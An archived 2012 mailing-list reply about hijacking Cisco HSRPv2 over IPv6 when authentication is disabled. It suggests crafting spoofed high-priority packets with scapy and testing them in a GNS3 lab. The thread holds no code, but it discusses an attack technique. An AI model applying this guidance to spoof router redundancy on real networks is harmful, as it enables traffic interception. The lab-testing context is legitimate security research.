[ipv6hackers] CIsco HSRP hijacking
Jim Small
jim.small at cdw.com
Sun Dec 2 19:23:06 CET 2012
> > I'm assuming you mean if md5 authentication isn't used? If not, then yes
> > you would be susceptible to spoofing attacks.
> >
> >
> Yes. MD5 authentication is not enabled.
>
> >
> > > For IPv6 network, HSRPv2 would be in placed. Would this HSRP hijacking
> > > technique works and applicable for IPv6 environment? Do anyone have a
> > > success test case for this?
> >
> > You should be able to use scapy to do the same attack for any FHRP (HSRP,
> > VRRP, GLBP) whether its v4 or v6 if the FHRP isn't using "secure"
> > authentication. See:
> > http://packetlife.net/blog/2008/oct/27/hijacking-hsrp/
> > http://www.gotohack.org/2011/01/scapy-hsrp-md5-auth-dissecter-
> to.html
> >
> >
> I actually refer to these same sites as references ; ) I understand about
> the background mechanism how the hijacking process could work and
> HSRPv2
> packet dissector class is not exists in Scapy v2.2.0-dev. I tried to make a
> Proof of Concept with Raw() packet replay with higher Priority value, yet
> no luck.
>
> I am curios if you or anyone around have created such a success test case
> before? I know theoretically it should happen. Thanks!
I haven't personally tried it. However, from looking at HSRPv2 packet captures the format looks pretty straight forward. You could always setup GNS3 with 2 7200s and then connect your system to a virtual interface to inject scapy packets. GNS3 even lets you do packet captures so you can do a hex comparison to validate you have the packet formatting correct. I wouldn't think it would be that hard but I haven't done it personally. So many cool ideas so little time... :-)
--Jim
More information about the Ipv6hackers
mailing list